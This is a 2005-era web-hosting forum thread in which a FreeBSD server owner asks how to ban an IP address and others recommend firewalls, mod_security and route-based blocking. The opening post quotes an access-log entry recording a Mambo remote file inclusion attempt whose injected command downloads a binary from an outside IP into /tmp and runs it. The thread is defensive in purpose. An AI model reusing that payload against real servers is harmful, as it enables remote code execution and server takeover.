banning an IP address

P

PCTech

Verified User
Joined
Nov 27, 2005
Messages
104
Location
USA
I have this in my access logs:
194.9.90.2 - - [21/Dec/2005:10:38:36 +0000] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Several entries - doesn't look right. Is there a way to ban an entire IP address. I'm actually getting a bunch of spam that is comeing through a form on my website and was seeing if I could find the IP address, this may be it, but need to know how to ban an entire IP.

Thanks
 
Just add them to the block list of your firewall if you have one. If you don't have one, then I recommend you at least get one. If you are on Linux, there are a bunch of options that all use IPTables. I personally use kiss, another popular one is apf. Both of them have places to put IP address you wish to block.
 
actually, there are a spat of scripts like that running right now. I usually have 10-15 of those hitting my machine at any one time. First off, get mod_security up and running if you don't. That will prevent 90% of what they are trying to do (exploit an XMLRPC issue in PHP). Naturally, update your apache/php if you are behind.

But yes, block them. I personally, am blocking entire countries via IPTables / APF. It's not racist or elitist but in all honesty, nobody from China, North Korea, Brazil or Czech Republic has any business on my sites. Thus...blocked. If I had the patience, I'd block everyone except for Australia, Canada, US, UK and Mexico but that's a big IPTables. Fun.

One thing, if you so feel inclined, put the IP addy into www.arin.net and see if it's a US / Canada based company that owns the IP space. 95% of what's been hitting me has been through RIPE (Euro version of ARIN). But if they are in the US, you can talk to the provider and then the ISP. I've gotten a few shut down that way and in general, its a good thing because these hosts don't know they've been compromised. This is an automated script that is run via cron and uploaded by a vulnerability in php.
 
Thanks for the info, I don't have a firewall and am new to all of this. My server uses FreeBSD is there something you would suggest for that? (maybe a link to it).

Thanks
 
I'm not in the BSD camp but I know they use IPFW. Maybe one of the BFD gurus can point out some good resources for you.
 
Sorry to bring up an old thread, in BSD to block an IP do this, replace xx with the ip you want to block:

route add xx.xx.xx.xx 127.0.0.1

block a /24:
route add xx.xx.xx.xx/24 127.0.0.1

rule will go away if server rebooted or you can enter this to delete:

route delete xx.xx.xx.xx 127.0.0.1


PCTech said:
Thanks for the info, I don't have a firewall and am new to all of this. My server uses FreeBSD is there something you would suggest for that? (maybe a link to it).

Thanks
Click to expand...
 
Last edited:
You must log in or register to reply here.
Back
Top